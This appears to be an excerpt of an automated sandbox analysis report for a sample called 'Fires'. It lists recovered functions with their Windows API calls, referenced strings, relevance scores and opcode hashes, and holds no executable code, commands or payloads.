Opcode ID: bcb66c260a6de9558335d88819b3739872a2052193c9b53d99ee2692761552da
Instruction ID: a9f0d27a6f4a1d8d1ff30b278aa62d3c866314602a57edef02ae7dcfd03d9839
Opcode Fuzzy Hash: bcb66c260a6de9558335d88819b3739872a2052193c9b53d99ee2692761552da
Instruction Fuzzy Hash: EB510EB1B01209AFDF18CF68DD85AAEBBBAFB48314F148129F519E6690D770DD048B60

Function 00D42128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00D42234: GetWindowLongW.USER32(?,000000EB), ref: 00D42242

GetSysColor.USER32(0000000F), ref: 00D42152

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 056263ee879e5693f969b5f73824a71e435e494bf8f3262c50d186a243d11bd4
Instruction ID: c30bde7cffc7f59f75011999cc38a4204286af2609ee9259d562f3d14892d2ad
Opcode Fuzzy Hash: 056263ee879e5693f969b5f73824a71e435e494bf8f3262c50d186a243d11bd4
Instruction Fuzzy Hash: F841A031141740AFDB245F389C84BBA3B6AEB42730F994656FAA6872E5C7318D42DB30

Function 00D413A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D828D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D828EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D828FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D82912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D82933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D82942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D8295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D8296E

Strings

(, xrefs: 00D82885

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (
API String ID: 1268354404-2063206799
Opcode ID: 10180c91c77d233b4b62cda284cdf481e3f0bf99fe25e9f1debcf20e748c55df
Instruction ID: 09b9b2c4461298beb93f00314380f2ad098e5a5c60c7599cd75ca72e97efb2cf
Opcode Fuzzy Hash: 10180c91c77d233b4b62cda284cdf481e3f0bf99fe25e9f1debcf20e748c55df
Instruction Fuzzy Hash: 96517834A00309AFDB24EF25CC45BAA7BB6FF88720F144519F946E72A0D770E990DB60

Function 00DD955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

Part of subcall function 00D419CD: GetCursorPos.USER32(?), ref: 00D419E1
Part of subcall function 00D419CD: ScreenToClient.USER32(00000000,?), ref: 00D419FE
Part of subcall function 00D419CD: GetAsyncKeyState.USER32(00000001), ref: 00D41A23
Part of subcall function 00D419CD: GetAsyncKeyState.USER32(00000002), ref: 00D41A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00DD95C7
ImageList_EndDrag.COMCTL32 ref: 00DD95CD
ReleaseCapture.USER32 ref: 00DD95D3
SetWindowTextW.USER32(?,00000000), ref: 00DD966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DD9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00DD975B

Strings

(, xrefs: 00DD956D
(, xrefs: 00DD9728
@GUI_DROPID, xrefs: 00DD96AD
@GUI_DRAGFILE, xrefs: 00DD96F6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
API String ID: 1924731296-3832140312
Opcode ID: 808545b643d5c2423b4565c8c776865764669cc3d3c5d836f2a9ee1abb1d8576
Instruction ID: 4bc4fbcbeb2c91f5be6701ea5ac75f81bd3931ac18f352ee943add6211a7f380
Opcode Fuzzy Hash: 808545b643d5c2423b4565c8c776865764669cc3d3c5d836f2a9ee1abb1d8576
Instruction Fuzzy Hash: 65517D70204304AFDB04EF24DC56FAA77E5FB88714F400A2EF596A62E1DB719948CB72

Function 00DAA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00D90D31,00000001,0000138C,00000001,00000000,00000001,?,00DBEEAE,00E12430), ref: 00DAA091
LoadStringW.USER32(00000000,?,00D90D31,00000001), ref: 00DAA09A

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D90D31,00000001,0000138C,00000001,00000000,00000001,?,00DBEEAE,00E12430,?), ref: 00DAA0BC
LoadStringW.USER32(00000000,?,00D90D31,00000001), ref: 00DAA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DAA1E0

Strings

^ ERROR, xrefs: 00DAA175
Line %d (File "%s"):, xrefs: 00DAA109
Error: , xrefs: 00DAA197
%s (%d) : ==> %s: %s %s, xrefs: 00DAA1C4
Line %d:, xrefs: 00DAA11A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 82755617e85f7d999377b1823d396ab8053a159bf4fd306a95cc9f71e2fbd47a
Instruction ID: 50d54dbc03115260ecb7ea38672143c64310cc1db97695606da6891c2d1a4e8a
Opcode Fuzzy Hash: 82755617e85f7d999377b1823d396ab8053a159bf4fd306a95cc9f71e2fbd47a
Instruction Fuzzy Hash: D1410D72800209ABCF05EBE4DD86EEEB778EF15340F500165B506B6092EB75AF49CB71

Function 00DA0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DA1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DA10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DA10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DA10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DA111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DA1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DA112D

Strings

\IPC$, xrefs: 00DA1075
SOFTWARE\Classes\, xrefs: 00DA0FFF
\CLSID, xrefs: 00DA1015

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: cbead7f68b3e32b7199b60c2ea6581b7dcc4a67e75ea7571900ff7040c5b5ffc
Instruction ID: 931c7c3abb7195b3b7ce520dad866df4f988bbc5576ff2dd89c5931d85db1a2d
Opcode Fuzzy Hash: cbead7f68b3e32b7199b60c2ea6581b7dcc4a67e75ea7571900ff7040c5b5ffc
Instruction Fuzzy Hash: CE410876C10229ABCF11EBA4DC85DEEB7B9FF54750F44406AE905A31A0EB319E44CBB0

Function 00DD4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DD4AD9
CreateCompatibleDC.GDI32(00000000), ref: 00DD4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DD4AF3
SelectObject.GDI32(00000000,00000000), ref: 00DD4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00DD4B06
DeleteDC.GDI32(00000000), ref: 00DD4B10
GetWindowLongW.USER32(?,000000EC), ref: 00DD4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00DD4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00DD4B3C

Strings

static, xrefs: 00DD4A71

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: fe972cb773c1a708778601e1c464712d5926f23170f419d84a41fc8cb277f914
Instruction ID: de2edf1a8b11411faeb89421fee2a3d5120f21dc70cf99b7618534d680d41d74
Opcode Fuzzy Hash: fe972cb773c1a708778601e1c464712d5926f23170f419d84a41fc8cb277f914
Instruction Fuzzy Hash: 99315C31141219BBDF129FA4DC09FDA3BAAFF09324F150212FA19E62A0C735D860DBB4

Function 00DAD11F Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00DAD1BE

Strings

stop, xrefs: 00DAD18F
warning, xrefs: 00DAD1A7
blank, xrefs: 00DAD140
info, xrefs: 00DAD15F
\+, xrefs: 00DAD151
`+, xrefs: 00DAD1CA, 00DAD1CD
\+, xrefs: 00DAD1CF
question, xrefs: 00DAD177

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: IconLoad
String ID: \+$\+$`+$blank$info$question$stop$warning
API String ID: 2457776203-3382907240
Opcode ID: 5e28b1d6fd5f6ae6456139a9103c67bb5f8c02e79935fe68cda836f2451caeb9
Instruction ID: 7d2147b2d0397cfe84c6a570087371194fbd380eef0cadc1e2b1739c2991a492
Opcode Fuzzy Hash: 5e28b1d6fd5f6ae6456139a9103c67bb5f8c02e79935fe68cda836f2451caeb9
Instruction Fuzzy Hash: D8110631A4C306BFE7055B14DC82EAE77ADDF16760B28002AF942A66C1EBB0AA4045B0

Function 00DC468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DC46B9
CoInitialize.OLE32(00000000), ref: 00DC46E7
CoUninitialize.OLE32 ref: 00DC46F1
_wcslen.LIBCMT ref: 00DC478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00DC480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00DC4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DC496B
CoGetObject.OLE32(?,00000000,00DE0B64,?), ref: 00DC498A
SetErrorMode.KERNEL32(00000000), ref: 00DC499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DC4A21
VariantClear.OLEAUT32(?), ref: 00DC4A35

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 88f99e9f3f4230cd26fc826d69d23ad32f4022ef0d90897e9439d8204378f8dd
Instruction ID: 2ad478931752567ceb90c3fcb7644b49f6cc50a6c6d590067234a4d054eeea73
Opcode Fuzzy Hash: 88f99e9f3f4230cd26fc826d69d23ad32f4022ef0d90897e9439d8204378f8dd
Instruction Fuzzy Hash: 6AC11471604302AF9700DF68C894E6BBBE9FF89748F14491DF98A9B250DB31ED45CB62

Function 00DB84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DB8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DB85D4
SHGetDesktopFolder.SHELL32(?), ref: 00DB85E8
CoCreateInstance.OLE32(00DE0CD4,00000000,00000001,00E07E8C,?), ref: 00DB8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DB86B9
CoTaskMemFree.OLE32(?,?), ref: 00DB8711
SHBrowseForFolderW.SHELL32(?), ref: 00DB879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DB87BF
CoTaskMemFree.OLE32(00000000), ref: 00DB87C6
CoTaskMemFree.OLE32(00000000), ref: 00DB881B
CoUninitialize.OLE32 ref: 00DB8821

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: daf53c33fcb7570269da708ad2d56a54730e42b0ac8a830262fef57e8f1bcffb
Instruction ID: 219c8410c3cb71f4e7bbc60fe2db9a9895accb4a0be848400f5c9edfae7f7458
Opcode Fuzzy Hash: daf53c33fcb7570269da708ad2d56a54730e42b0ac8a830262fef57e8f1bcffb
Instruction Fuzzy Hash: 78C1D875A00205EFCB14DFA4C884DAEBBF9EF48344B148599E41ADB361DB31ED45DBA0

Function 00DA0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DA039F
SafeArrayAllocData.OLEAUT32(?), ref: 00DA03F8
VariantInit.OLEAUT32(?), ref: 00DA040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00DA042A
VariantCopy.OLEAUT32(?,?), ref: 00DA047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00DA0491
VariantClear.OLEAUT32(?), ref: 00DA04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00DA04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DA04BC
VariantClear.OLEAUT32(?), ref: 00DA04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DA04D9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 73b209aaa4013b1e7d136e9ce2c07f6a31dbb7d689811cf58dfb38d50f860d81
Instruction ID: 88d2935281ca43e2c81c2f5cce7a5b2f8b002d2b141b9d5862bcc8f913d9c1dc
Opcode Fuzzy Hash: 73b209aaa4013b1e7d136e9ce2c07f6a31dbb7d689811cf58dfb38d50f860d81
Instruction Fuzzy Hash: C9415C35A00219AFCF10DFA4D8849AEBFB9FF49354F008469E955E7361CB74A945CBB0

Function 00DAA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DAA65D
GetAsyncKeyState.USER32(000000A0), ref: 00DAA6DE
GetKeyState.USER32(000000A0), ref: 00DAA6F9
GetAsyncKeyState.USER32(000000A1), ref: 00DAA713
GetKeyState.USER32(000000A1), ref: 00DAA728
GetAsyncKeyState.USER32(00000011), ref: 00DAA740
GetKeyState.USER32(00000011), ref: 00DAA752
GetAsyncKeyState.USER32(00000012), ref: 00DAA76A
GetKeyState.USER32(00000012), ref: 00DAA77C
GetAsyncKeyState.USER32(0000005B), ref: 00DAA794
GetKeyState.USER32(0000005B), ref: 00DAA7A6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: bfd6e9e43214989a360490ae907059e97efe9ecd4bd811500a421fe0b98ccedb
Instruction ID: 733e703f645600d9a48f1eb055363b49789c05eddeb83f8a154ace7e9ea732a7
Opcode Fuzzy Hash: bfd6e9e43214989a360490ae907059e97efe9ecd4bd811500a421fe0b98ccedb
Instruction Fuzzy Hash: BC419264544BC969FF31966888043B6BFB16B13344F4C825AD5C64A6C2EBA49DC8CBB3

Function 00DC9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00DC9750

Part of subcall function 00DA9805: _wcslen.LIBCMT ref: 00DA9828

_wcslen.LIBCMT ref: 00DC97AB
_wcslen.LIBCMT ref: 00DC97F9
_wcslen.LIBCMT ref: 00DC9839
_wcslen.LIBCMT ref: 00DC98CB

Strings

stdcall, xrefs: 00DC9833, 00DC9838
none, xrefs: 00DC98C2, 00DC98C7
winapi, xrefs: 00DC97F3, 00DC97F8
cdecl, xrefs: 00DC97A5, 00DC97AA

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 3baa97d962c6f24de961244698aec62572913403a912ddfebf2c8d575b72c1db
Instruction ID: 11a65e2dee449c1229ae9f2b7d8b68a06e7b34e5ee004f99079af9583a906c2b
Opcode Fuzzy Hash: 3baa97d962c6f24de961244698aec62572913403a912ddfebf2c8d575b72c1db
Instruction Fuzzy Hash: B251BE31A005179BCB14DF68C965ABEF3A5EF65360B25422DF866E7284DB31DE40CBB0

Function 00DC4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00DC41D1
CoUninitialize.OLE32 ref: 00DC41DC
CoCreateInstance.OLE32(?,00000000,00000017,00DE0B44,?), ref: 00DC4236
IIDFromString.OLE32(?,?), ref: 00DC42A9
VariantInit.OLEAUT32(?), ref: 00DC4341
VariantClear.OLEAUT32(?), ref: 00DC4393

Strings

NULL Pointer assignment, xrefs: 00DC427B
Invalid parameter, xrefs: 00DC42C2
Failed to create object, xrefs: 00DC4241, 00DC42F7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 65d010d3974a49bfdf37bcae5553eb0c6ab4c23863c5f8251155033ce9070a84
Instruction ID: 47db1ae325a3be6a6c84a554b3b34fc9c45ebd444852a5145978e6b985030a0f
Opcode Fuzzy Hash: 65d010d3974a49bfdf37bcae5553eb0c6ab4c23863c5f8251155033ce9070a84
Instruction Fuzzy Hash: 7B618D71604702AFD710DF64C899F5ABBE4EF89714F04051DF8819B2A1D770E948CBB6

Function 00DB8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00DB8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DB8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DB8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DB8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00DB8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00DB8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DB8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00DB8DDA

Strings

*.*, xrefs: 00DB8DE0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: af8dbf76bc304954987ab58e19505d3a0cb914affee5a164d37c9fb279e652ce
Instruction ID: dd34c904bb2c2e99cd7298a6d9f638ac1fb1fd5a34bb742cd0f0de6003f3bbeb
Opcode Fuzzy Hash: af8dbf76bc304954987ab58e19505d3a0cb914affee5a164d37c9fb279e652ce
